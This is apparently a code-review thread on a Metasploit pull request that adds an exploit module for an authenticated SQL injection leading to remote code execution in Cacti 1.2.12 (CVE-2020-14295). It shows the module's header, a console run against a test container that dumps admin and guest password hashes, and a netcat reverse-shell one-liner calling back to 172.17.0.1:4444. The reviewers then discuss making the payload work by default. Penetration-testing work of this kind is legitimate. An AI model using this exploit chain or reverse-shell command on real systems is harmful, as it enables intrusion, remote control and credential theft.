modules/exploits/unix/http/cacti_filter_sqli_rce.rb

```diff
@@ -0,0 +1,220 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/hashes/identify'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cacti color filter authenticated SQLi to RCE',
+        'Description' => %q{
+          This module exploits a SQL injection vulnerability in Cacti 1.2.12 and before. An admin can exploit the filter
+          variable within color.php to pull arbitrary values as well as conduct stacked queries.  With stacked queries, the
+          path_php_binary value is changed within the settings table to a payload, and an update is called to execute the payload.
+          After calling the payload, the value is reset.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'h00die', # msf module
+            'Leonardo Paiva', # edb, RCE
+            'Mayfly277' # original github, M4yFly on twitter SQLi
+          ],
+        'References' =>
+          [
+            [ 'EDB', '49810' ],
+            [ 'URL', 'https://github.com/Cacti/cacti/issues/3622' ],
+            [ 'CVE', '2020-14295' ]
+          ],
+        'Platform' => ['unix'],
```

Comment:
By default I wasn't get a shell against a centos8 container as it didn't have `nc` installed
```
msf6 exploit(unix/http/cacti_filter_sqli_rce) > rerun
[*] Reloading module...

[+] mkfifo /tmp/pmmon; nc 172.17.0.1 4444 0</tmp/pmmon | /bin/sh >/tmp/pmmon 2>&1; rm /tmp/pmmon
[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Grabbing CSRF
[+] CSRF: sid:d741ec001908e585b3b1e37f7ab6e1e0d2cb26ab,1620124510
[*] Attempting login
[*] Dumping creds
[+] Username: admin, Password Hash: $2y$10$zBxQnqS7zVj1ChNIZy9zpe5x0CCUu.3unpOTl9zOl0LO2.JRAotE6
[!] No active DB -- Credential data will not be saved!
[+] Username: guest, Password Hash: 43e9a4ab75570f5b
[*] Backing-up path_php_binary value
[+] path_php_binary: /usr/bin/php
[*] Uploading payload
[*] Triggering payload
[*] Cleaning up environment
[*] Grabbing CSRF
[+] CSRF: sid:9fd492041e90b210d66becc5264b4fad7d91a949,1620124510
[*] Attempting login
[*] Resetting DB Value
[*] Exploit completed, but no session was created.
msf6 exploit(unix/http/cacti_filter_sqli_rce) > 
```

Running the payload in the container:
```
[root@cactimaster cacti]# mkfifo /tmp/pmmon; nc 172.17.0.1 4444 0</tmp/pmmon | /bin/sh >/tmp/pmmon 2>&1; rm /tmp/pmmon
mkfifo: cannot create fifo '/tmp/pmmon': File exists
bash: nc: command not found
rm: remove fifo '/tmp/pmmon'? 
```

Not sure if we want to make any changes for the default payload to work out of the box 👀

Reply:
I run into this scenario frequently and set a Docker-happy default payload if it's an officially supplied Docker image. YMMV.

Reply:
In this case it's not so much a problem with the target itself being a super cut down docker container, but just centos not shipping with nc by default I think 👀

Reply:
At least we know the target will have PHP, if that makes things easier 😄

Reply:
Actually, yeah, it does. This could be `ARCH_PHP`, and we even know `path_php_binary`. cc @h00die